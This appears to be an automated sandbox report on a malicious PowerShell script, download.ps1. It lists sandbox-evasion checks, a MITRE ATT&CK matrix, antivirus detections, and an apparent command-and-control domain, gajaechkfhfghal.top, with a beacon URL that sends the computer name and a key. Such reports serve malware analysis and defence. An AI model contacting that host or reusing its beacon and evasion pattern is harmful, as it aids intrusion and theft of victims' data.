Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6260Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3504Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1604648751.000001E5351A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware`S
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "VMware"
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 1:en-US:VMware
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine`S
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: "IsVirtualMachine"
Source: powershell.exe, 00000000.00000002.1604648751.000001E535299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.1561791044.000001E51DBDD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
121
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager121
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets2
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps18%ReversingLabsScript.Trojan.Heuristic
download.ps117%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
www.google.com
172.217.19.228
truefalse
    high
    gajaechkfhfghal.top
    45.61.136.138
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://gajaechkfhfghal.top/q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527false
        unknown
        http://www.google.com/false
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://$zmtpqkiyrv4wb3j/$3xbonqgscw6vtrh.php?id=$env:computername&key=$gqsylrwkvhi&s=527powershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            http://gajaechkfhfghal.toppowershell.exe, 00000000.00000002.1561791044.000001E51E6E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E38D000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifpowershell.exe, 00000000.00000002.1561791044.000001E51F315000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E6FF000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://contoso.com/Licensepowershell.exe, 00000000.00000002.1589595408.000001E52CEE2000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schema.org/WebPagepowershell.exe, 00000000.00000002.1561791044.000001E51E70B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F63A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F30E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F60D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F61A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F640000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52CE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F62E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F2EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D16B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F2E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51F315000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://0.google.com/powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://schema.org/WebPageXpowershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://contoso.com/powershell.exe, 00000000.00000002.1589595408.000001E52CEE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1589595408.000001E52CEE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.google.compowershell.exe, 00000000.00000002.1561791044.000001E51E6E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E6FF000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.microsoft.ciQpowershell.exe, 00000000.00000002.1604648751.000001E53517A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://apis.google.compowershell.exe, 00000000.00000002.1561791044.000001E51E717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E919000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52CE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D16B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1561791044.000001E51CE71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1589595408.000001E52CEE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1561791044.000001E51E717000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D0DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D04B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52CE71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1589595408.000001E52D16B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.1589595408.000001E52CEE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://0.googlepowershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1561791044.000001E51D098000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://0.google.powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://0.google.com/powershell.exe, 00000000.00000002.1561791044.000001E51E76B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1589595408.000001E52D16B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.1561791044.000001E51EE48000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
